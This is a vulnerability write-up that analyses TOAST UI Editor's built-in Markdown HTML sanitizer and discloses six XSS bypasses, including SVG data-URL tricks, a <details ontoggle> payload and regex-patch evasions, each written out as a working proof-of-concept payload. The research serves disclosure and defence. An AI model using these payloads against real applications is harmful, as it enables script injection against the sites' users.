TOAST UI Editor is a GFM Markdown and WYSIWYG editor. It also has its own Markdown parser and previewer, so no third-party library is needed.
TOAST UI Editor provides a Viewer in case you want to show Markdown content without loading the Editor; the Viewer is much lighter than the Editor. Sample code for using the Viewer:
import Viewer from '@toast-ui/editor/dist/toastui-editor-viewer';
import '@toast-ui/editor/dist/toastui-editor-viewer.css';
const viewer = new Viewer({
  el: document.querySelector('#viewer'),
  height: '600px',
  initialValue: `# Markdown`
});
I make a habit of asking whether a Markdown parser has an XSS vulnerability, so I started to review its code.
0x01 How Markdown is compiled to HTML
In the real world, the two most common ways to prevent XSS in a Markdown parser are:
- HTML-entity-encode the text and attributes while compiling each part of the Markdown
- Do nothing while parsing and compiling, and run a sanitizer after the HTML is generated
TOAST UI Editor uses the latter approach.
The security of the latter approach depends on the HTML sanitizer, so that is what I was interested in. After reading the documentation, I noticed that if no user-provided HTML sanitizer is given, the built-in one is used: https://github.com/nhn/tui.editor/blob/48a01f5/apps/editor/src/sanitizer/htmlSanitizer.ts
Let's look at the sanitizer's steps:
- Remove the HTML comments and the onload attributes.
- Create a new DOM tree and assign the user-input data to its innerHTML.
- Walk the DOM tree and remove the tags in the denylist, such as <script>, <iframe>, <form>, etc.
- Walk the element attributes and remove every attribute whose name does not start with a keyword in the allowlist.
- For attributes whose name matches /href|src|background/i, do an additional check.
- Get a clean DOM tree and return its innerHTML.
0x02 A bypass requiring user interaction was found
No on* attributes are in the allowlist, so the most common XSS payloads are of little use. Payloads without JavaScript events are also ineffective because of the denylist, for example:
<script>alert(1)</script>
<iframe src="javascript:alert(1)">
<iframe srcdoc="<img src=1 onerror=alert(1)>"></iframe>
<form><input type=submit formaction=javascript:alert(1) value=XSS>
<form><button formaction=javascript:alert(1)>XSS
<form action=javascript:alert(1)><input type=submit value=XSS>
An anchor tag with a JavaScript URL scheme, <a href="javascript:alert(1)">XSS</a>, is a common payload that can get past an allowlist, but this HTML sanitizer applies a strict check to it:
const reXSSAttr = /href|src|background/i;
const reXSSAttrValue = /((java|vb|live)script|x):/i;
const reWhitespace = /[ \t\r\n]/g;
function isXSSAttribute(attrName: string, attrValue: string) {
  return attrName.match(reXSSAttr) && attrValue.replace(reWhitespace, '').match(reXSSAttrValue);
}
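To see what this check accepts and rejects, the function can be exercised outside the editor. The sketch below copies the three regular expressions from the excerpt above into plain JavaScript (type annotations are dropped and the result is coerced to a boolean for readability); the sample attribute names and values are illustrative only.

```javascript
// Regular expressions copied from the sanitizer excerpt above.
const reXSSAttr = /href|src|background/i;
const reXSSAttrValue = /((java|vb|live)script|x):/i;
const reWhitespace = /[ \t\r\n]/g;

// Same logic as the excerpt, coerced to a boolean for readability.
function isXSSAttribute(attrName, attrValue) {
  return Boolean(
    attrName.match(reXSSAttr) &&
      attrValue.replace(reWhitespace, '').match(reXSSAttrValue)
  );
}

// Illustrative values, as the sanitizer would see them after HTML parsing.
const samples = [
  ['href', 'javascript:alert(1)'],       // plain keyword
  ['href', 'javasc\tript:alert(1)'],     // whitespace is stripped before matching
  ['xlink:href', 'JaVaScRiPt:alert(1)'], // name contains "href", match ignores case
  ['href', 'https://example.com/'],      // harmless URL
  ['title', 'javascript:alert(1)'],      // attribute name is not checked at all
];

const results = samples.map(([name, value]) => isXSSAttribute(name, value));
console.log(results); // [ true, true, true, false, false ]
```

The check is purely keyword-based: it only inspects the attribute value as a string, so it can only catch a script scheme that is literally visible in that string.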
Because the sanitizer runs after DOM parsing, HTML entities are already decoded by the time the check runs, so HTML-encoding tricks do not work, for example:
<a href="javasc ript:alert(1)">XSS</a>
<a href="javasc	ript:alert(1)">XSS</a>
<a href="javascript:alert(1)">XSS</a>
I found that <svg> is not in the denylist, so I tried some tricks with it.
This one is not usable because the javascript: keyword is checked, as described above:
<svg><a xlink:href="javascript:alert(1)"><text x="100" y="100">XSS</text></a>
Then I thought of the <use> tag, whose role is to reference an SVG element, like this:
<!-- Two circles are shown -->
<svg>
<circle id="myCircle" cx="5" cy="5" r="4" stroke="blue"/>
<use href="#myCircle"></use>
</svg>
Unlike <a xlink:href>, <use href> doesn't support the JavaScript URL scheme, but the data: URL scheme is supported.
<svg><use href="data:image/svg+xml,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javascript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
It is a clean payload, but the javascript: keyword still appears in the href value.
According to RFC 2397, base64 encoding is allowed in a data URL, which can be used to bypass the keyword check:
<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyAKICAgIHhtbG5zOnhsaW5rPSdodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rJyB3aWR0aD0nMTAwJyBoZWlnaHQ9JzEwMCc+PGEgeGxpbms6aHJlZj0namF2YXNjcmlwdDphbGVydCgxKSc+PHJlY3QgeD0nMCcgeT0nMCcgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnIC8+PC9hPjwvc3ZnPg#x"></use></svg>
Great, this is the first payload that can perform an XSS attack in Tui Editor.
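Why the base64 variant slips through can be checked without a browser. The sketch below reuses the value check from the sanitizer excerpt; `passesCheck` is a hypothetical helper name, and `btoa` and `atob` are assumed to be available as globals, as they are in browsers and in recent Node.js versions.

```javascript
const reXSSAttrValue = /((java|vb|live)script|x):/i;
const reWhitespace = /[ \t\r\n]/g;

// Hypothetical helper: true when the sanitizer's value check finds nothing suspicious.
function passesCheck(attrValue) {
  return !reXSSAttrValue.test(attrValue.replace(reWhitespace, ''));
}

// Inner SVG document taken from the payload above.
const inner =
  "<svg id='x' xmlns='http://www.w3.org/2000/svg' " +
  "xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'>" +
  "<a xlink:href='javascript:alert(1)'>" +
  "<rect x='0' y='0' width='100' height='100' /></a></svg>";

const prefix = 'data:image/svg+xml;base64,';
const plainUrl = 'data:image/svg+xml,' + inner + '#x';
const base64Url = prefix + btoa(inner) + '#x';

console.log(passesCheck(plainUrl));  // false: "javascript:" is visible in the value
console.log(passesCheck(base64Url)); // true: the keyword is hidden by the encoding

// Decoding the base64 part gives back the original document, keyword included.
const roundTrip = atob(base64Url.slice(prefix.length, -2));
console.log(roundTrip.includes('javascript:')); // true
```

The base64 alphabet contains no colon, so neither alternative of the value pattern can match inside the encoded part.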
Similarly, a charset is allowed in the data URL scheme. ISO-2022-JP is a magical charset that often shows up in articles about the XSS Auditor. For example, \x1B\x28\x42 is ignored when the charset is ISO-2022-JP, so this trick is useful here:
<svg><use href="data:image/svg+xml;charset=ISO-2022-JP,<svg id='x' xmlns='http://www.w3.org/2000/svg' xmlns:xlink='http://www.w3.org/1999/xlink' width='100' height='100'><a xlink:href='javas%1B%28Bcript:alert(1)'><rect x='0' y='0' width='100' height='100' /></a></svg>#x"></use></svg>
This is the second payload that can perform an XSS attack in Tui Editor.
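The same comparison explains the charset trick. In the sketch below, the sanitizer-side check is the regular expression from the excerpt, while `simulateIso2022JpDecode` is a hypothetical stand-in for what an ISO-2022-JP decoder does with this particular input: it only drops the ESC ( B escape sequence, which switches to ASCII and emits no character. It is not a real decoder.

```javascript
const reXSSAttrValue = /((java|vb|live)script|x):/i;
const reWhitespace = /[ \t\r\n]/g;

// The href fragment as it appears in the attribute, still percent-encoded.
const rawHref = 'javas%1B%28Bcript:alert(1)';

// What the sanitizer's value check sees: no contiguous "javascript:".
const flagged = reXSSAttrValue.test(rawHref.replace(reWhitespace, ''));

// Hypothetical stand-in for the charset decoder: percent-decode, then drop
// the ESC ( B sequence (bytes 0x1B 0x28 0x42).
function simulateIso2022JpDecode(text) {
  return decodeURIComponent(text).replace(/\x1B\(B/g, '');
}

const decoded = simulateIso2022JpDecode(rawHref);
console.log(flagged); // false
console.log(decoded); // javascript:alert(1)
```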
Although I found two ways to bypass the HTML sanitizer, both require user interaction, so they are not the best payloads in the real world.
0x02 A bypass requiring no user interaction was found
After searching the commit history of Tui Editor, I noticed that they had fixed an XSS vulnerability last month.
They added a replacement before the sanitizer that removes onload= from the user input.
But I couldn't understand why they did that, since onload was not in the allowlist, until I found a test case in the code:
<svg><svg onload=alert(1)>
What a simple payload, but it did bypass the earlier HTML sanitizer.
How does it work?
In my opinion, it works because of a race condition: the JavaScript is executed after the innerHTML assignment, before the allowlist and denylist walks.
So how do we find other payloads like that? A payload must satisfy two conditions:
- Its JavaScript event is triggered after the innerHTML assignment even though the DOM is not written to the page
- Its JavaScript event is triggered immediately after the innerHTML assignment
Lots of payloads satisfy the first condition, such as <img src=1 onerror=alert(1)>:
const root = document.createElement('div');
root.innerHTML = `<img src=1 onerror=alert(1)>`
In contrast, the two payloads <svg onload=alert(1)> and <script>alert(1)</script> don't satisfy this requirement.
The second condition is even trickier, to the point that while I know some payloads can be exploited, I'm not sure why they can be exploited.
The <img> payload can't satisfy the second condition because it triggers onerror only when the src image fails to load. That involves I/O operations that take longer, so onerror certainly can't fire before it is removed.
The following two payloads satisfy both conditions.
<svg><svg onload=alert(1)>
<details open ontoggle=alert(1)>
The first one was fixed earlier; <details> is the third payload that can perform an XSS attack in Tui Editor, and it requires no user interaction.
0x03 Found 3 patch bypasses
Let's review the patch for the double <svg> payload:
export const TAG_NAME = '[A-Za-z][A-Za-z0-9-]*';
const reXSSOnload = new RegExp(`(<${TAG_NAME}[^>]*)(onload\\s*=)`, 'ig');
export function sanitizeHTML(html: string) {
  const root = document.createElement('div');
  if (isString(html)) {
    html = html.replace(reComment, '').replace(reXSSOnload, '$1');
    root.innerHTML = html;
  }
  // ...
}
The patch replaces every match of the regexp (<[A-Za-z][A-Za-z0-9-]*[^>]*)(onload\\s*=) with its first group, which deletes the onload= part.
This patch is flawed; I found 3 problems with it.
greedy mode problem
By default, the regex engine matches as many characters as possible for the current pattern, so if a tag contains two onload=, [^>]* extends up to the second one. Only the second onload= is removed, and the first one is kept.
The payload is:
<svg><svg onload=alert(1) onload=alert(2)>
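The effect of the greedy match can be reproduced with the regular expression from the patch alone; no DOM is needed. A minimal sketch, where `stripOnload` is an illustrative wrapper around the patch's `replace` call:

```javascript
const TAG_NAME = '[A-Za-z][A-Za-z0-9-]*';
const reXSSOnload = new RegExp(`(<${TAG_NAME}[^>]*)(onload\\s*=)`, 'ig');

// Illustrative wrapper: the same replace call the patch applies before innerHTML.
function stripOnload(html) {
  return html.replace(reXSSOnload, '$1');
}

const greedyOut = stripOnload('<svg><svg onload=alert(1) onload=alert(2)>');
console.log(greedyOut); // <svg><svg onload=alert(1) alert(2)>
```

Only the last onload= inside the tag is consumed by the second group, so the first handler reaches the innerHTML assignment untouched.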
lazy mode problem
If I change greedy mode to lazy mode, is that enough to defend against the XSS attack?
(<[A-Za-z][A-Za-z0-9-]*[^>]*?)(onload\\s*=)
This regex is divided into two groups, (<[A-Za-z][A-Za-z0-9-]*[^>]*?) and (onload\\s*=). When the user input matches, the second group is deleted and the first group, $1, is kept.
So even in lazy mode, only the first onload= is deleted and the second onload= is still kept:
<p><svg><svg onload=onload=alert(1)></svg></svg></p>
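This behavior can also be checked with string operations only. The sketch below builds the hypothetical lazy variant discussed above (it is not part of the actual patch) and runs it, next to the original greedy expression, on the inner part of the payload:

```javascript
const TAG_NAME = '[A-Za-z][A-Za-z0-9-]*';
// Expression from the patch (greedy) and the hypothetical lazy variant.
const reGreedyOnload = new RegExp(`(<${TAG_NAME}[^>]*)(onload\\s*=)`, 'ig');
const reLazyOnload = new RegExp(`(<${TAG_NAME}[^>]*?)(onload\\s*=)`, 'ig');

const doubled = '<svg><svg onload=onload=alert(1)>';

const lazyOut = doubled.replace(reLazyOnload, '$1');
const greedyOut2 = doubled.replace(reGreedyOnload, '$1');

console.log(lazyOut);    // <svg><svg onload=alert(1)>
console.log(greedyOut2); // <svg><svg onload=alert(1)>
```

Because each tag is matched only once and a single onload= is removed per match, one removal turns the doubled attribute into a working one in both modes.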
> problem
Looking at [^>]*, the author intends to search for onload= until the tag closes, but there is a bug here: a > character can also appear inside an HTML attribute value, where it is not a tag delimiter.
So if the regex meets a > inside an attribute value, it stops searching, and an onload= after that point is retained.
<svg><svg x=">" onload=alert(1)>
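A quick way to confirm this is to run the patch's expression against the payload and compare the result with the input. A minimal sketch using only the regular expression from the patch:

```javascript
const TAG_NAME = '[A-Za-z][A-Za-z0-9-]*';
const reXSSOnload = new RegExp(`(<${TAG_NAME}[^>]*)(onload\\s*=)`, 'ig');

const payload = '<svg><svg x=">" onload=alert(1)>';
const quotedOut = payload.replace(reXSSOnload, '$1');

// [^>]* stops at the ">" inside the quoted attribute value,
// so the regex never reaches the onload= that follows it.
console.log(quotedOut === payload); // true: nothing was removed
```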
0x04 Summary
In this article, I described 6 ways to bypass the built-in HTML sanitizer of TOAST UI Editor: 2 are based on <svg><use> and require user interaction, and 4 need no user interaction (the <details> payload and the 3 bypasses of the patch made one month ago).
Among them, <svg><svg onload=alert(1)> is a magical payload whose principle I have not been able to confirm to this day.
While researching these vulnerabilities, I published an XSS challenge in my friend circle. @ZeddYu_Lu then posted it to Twitter, where it became popular: https://twitter.com/ZeddYu_Lu/status/1421091362410156032
I also created an issue about these XSS vulnerabilities: https://github.com/nhn/tui.editor/issues/1717. There is no patch yet.
If you use TOAST UI Editor, I suggest replacing the built-in HTML sanitizer with a well-tested third-party HTML sanitizer such as https://github.com/cure53/DOMPurify.